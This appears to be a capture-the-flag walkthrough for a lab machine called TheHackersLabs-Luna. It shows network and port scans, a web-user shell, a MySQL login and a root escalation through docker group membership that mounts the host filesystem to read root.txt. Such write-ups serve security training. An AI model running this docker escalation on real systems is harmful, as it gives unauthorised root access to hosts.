❯ sudo arp-scan -l [sudo] password for Pepster: Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.60.1 00:50:56:c0:00:08 VMware, Inc. 192.168.60.2 00:50:56:e3:f6:57 VMware, Inc. 192.168.60.167 08:00:27:df:f5:4e PCS Systemtechnik GmbH 192.168.60.254 00:50:56:e0:65:b2 VMware, Inc.
12 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 2.087 seconds (122.66 hosts/sec). 4 responded ❯ export ip=192.168.60.167 ❯ rustscan -a $ip .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : http://discord.skerritt.blog : : https://github.com/RustScan/RustScan : -------------------------------------- Scanning ports like it's my full-time job. Wait, it is.
[~] The config file is expected to be at "/home/Pepster/.rustscan.toml" [!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers [!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. Open 192.168.60.167:80 Open 192.168.60.167:5000 [~] Starting Script(s) [~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-31 15:42 CST Initiating ARP Ping Scan at 15:42 Scanning 192.168.60.167 [1 port] Completed ARP Ping Scan at 15:42, 0.09s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 15:42 Completed Parallel DNS resolution of 1 host. at 15:42, 0.01s elapsed DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0] Initiating SYN Stealth Scan at 15:42 Scanning 192.168.60.167 [2 ports] Discovered open port 80/tcp on 192.168.60.167 Discovered open port 5000/tcp on 192.168.60.167 Completed SYN Stealth Scan at 15:42, 0.04s elapsed (2 total ports) Nmap scan report for 192.168.60.167 Host is up, received arp-response (0.00036s latency). Scanned at 2025-01-31 15:42:53 CST for 0s PORT STATE SERVICE REASON 80/tcp open http syn-ack ttl 64 5000/tcp open upnp syn-ack ttl 64 MAC Address: 08:00:27:DF:F5:4E (Oracle VirtualBox virtual NIC) Read data files from: /usr/share/nmap Nmap done: 1 IP address (1 host up) scanned in 0.33 seconds Raw packets sent: 3 (116B) | Rcvd: 3 (116B)
(remote) www-data@TheHackersLabs-Luna:/var/www/RODGAR$ mysql -uadmin -p Enter password: Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 8 Server version: 8.0.39-0ubuntu0.24.04.1 (Ubuntu)
Copyright (c) 2000, 2024, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners.
Type 'help;' or '\h'forhelp. Type '\c' to clear the current input statement.
(remote) juan@TheHackersLabs-Luna:/tmp$ su jose Password: jose@TheHackersLabs-Luna:/tmp$ sudo -l [sudo] password for jose: Sorry, user jose may not run sudo on TheHackersLabs-Luna. jose@TheHackersLabs-Luna:/tmp$ cd ~ jose@TheHackersLabs-Luna:~$ ls jose@TheHackersLabs-Luna:~$ ls -al total 8 drwxr-x--- 2 jose jose 4096 ago 13 14:34 . drwxr-xr-x 6 root root 4096 ago 14 14:23 .. lrwxrwxrwx 1 jose jose 9 ago 13 13:48 .bash_history -> /dev/null jose@TheHackersLabs-Luna:~$ id uid=1002(jose) gid=1002(jose) groups=1002(jose),111(docker)
利用docker提权即可
如遇网络问题,clash开启tun模式即可,这样靶机也能科学上网了
1 2 3 4 5 6 7 8 9 10 11
jose@TheHackersLabs-Luna:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh Unable to find image 'alpine:latest' locally latest: Pulling from library/alpine 1f3e46996e29: Pull complete Digest: sha256:56fa17d2a7e7f168a043a2712e63aed1f8543aeafdcee47c58dcffe38ed51099 Status: Downloaded newer image for alpine:latest # id uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo) # cat /root/root.txt 74cc1c60799e0a786ac7094b532f01b1